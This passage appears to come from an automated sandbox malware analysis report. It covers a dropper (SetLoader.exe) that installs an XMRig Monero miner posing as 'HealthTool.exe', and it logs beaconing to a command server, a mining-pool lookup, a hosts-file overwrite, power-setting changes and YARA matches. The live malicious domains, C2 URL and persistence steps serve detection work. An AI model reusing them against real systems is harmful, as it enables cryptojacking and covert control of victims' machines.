  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  Content-Length: 96
  Host: animoanimalestop.fun
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
  Content-Length: 208
  Host: animoanimalestop.fun
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
  Content-Length: 101666
  Host: animoanimalestop.fun
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
  Content-Length: 745
  Host: animoanimalestop.fun
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
  Content-Length: 212
  Host: animoanimalestop.fun
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
  Content-Length: 35
  Host: animoanimalestop.fun
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
  Content-Length: 96804
  Host: animoanimalestop.fun
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
  Content-Length: 35
  Host: animoanimalestop.fun
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: animoanimalestop.fun
Source: global traffic, DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: unknown, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  Content-Length: 96
  Host: animoanimalestop.fun
Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: w1.exe, 00000004.00000000.2038525410.0000000000B2C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
              Source: w1.exe, 00000004.00000000.2038525410.0000000000B2C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
              Source: w1.exe, 00000004.00000003.2276868902.0000000000F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/%
              Source: w1.exe, 00000004.00000003.2282018670.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8r
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/C
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/G
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/Y
              Source: w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/f
              Source: w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/m
              Source: w1.exe, 00000004.00000003.2223062248.0000000000F29000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/y
              Source: w1.exe, 00000004.00000003.2251052982.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2268729226.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2306124438.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun:443
              Source: w1.exe, 00000004.00000003.2268209246.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2317476232.0000000007EF0000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2223062248.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun:443/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNH
              Source: w1.exe, 00000004.00000003.2277021614.0000000000EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun:4438
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2318909011.0000000009B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49744 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | File written: C:\Windows\System32\drivers\etc\hosts

              Operating System Destruction

              Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process information set: 01 00 00 00
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process information set: 01 00 00 00

              System Summary

              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects coinmining malware Author: ditekSHen
              Source: Process Memory Space: HealthTool.exe PID: 5628, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: C:\Users\user\Desktop\SetLoader.exe | File dump: w1.exe.0.dr 834649568
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | File dump: HealthTool.exe.5.dr 831071200
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe | File dump: WmiPrvSE.exe.41.dr 827374560
              Source: HealthTool.exe.5.dr | Static PE information: section name: .2}k
              Source: HealthTool.exe.5.dr | Static PE information: section name: .Zj[
              Source: HealthTool.exe.5.dr | Static PE information: section name: .&T7
              Source: WmiPrvSE.exe.41.dr | Static PE information: section name: .oU[
              Source: WmiPrvSE.exe.41.dr | Static PE information: section name: .G&p
              Source: WmiPrvSE.exe.41.dr | Static PE information: section name: .>n>
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\conhost.exe | Code function: 67_2_0000000140001394 NtQueryKey
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00617FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe | File created: C:\Windows\TEMP\kzezoxxlsgop.sys
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_jxjnuw3x.cmi.ps1
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_0061F963
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00619906
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00612FCB
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00644044
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_006260F7
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00622125
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00629111
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_006282D0
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_0061E394
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00621476
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00626445
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_0062976F
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00637738
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00637967
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00620949
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_0062EA07
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00613AB7
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_0063FA90
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00614C6E
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00628C7E
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00625E86
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_0063FF3E
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: 0_2_00620FAC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_03470D4A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_03470F4A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_0347135A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_0347EF3A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_0347EDA8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_03480E4A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_034CD25A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_03470C1A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Code function: 4_2_034CD0FA
              Source: C:\Windows\System32\conhost.exe | Code function: 67_2_0000000140003160
              Source: C:\Windows\System32\conhost.exe | Code function: 67_2_00000001400026E0
              Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\kzezoxxlsgop.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: String function: 00631D60 appears 31 times
              Source: C:\Users\user\Desktop\SetLoader.exe | Code function: String function: 00631590 appears 57 times
              Source: w1.exe.0.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: w1.exe.0.dr | Static PE information: Number of sections : 11 > 10
              Source: SetLoader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: Process Memory Space: HealthTool.exe PID: 5628, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: classification engine | Classification label: mal100.adwa.spyw.evad.mine.winEXE@99/15@2/2
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00617BFF GetLastError,FormatMessageW,0_2_00617BFF
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0062C652
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4948:120:WilError_03
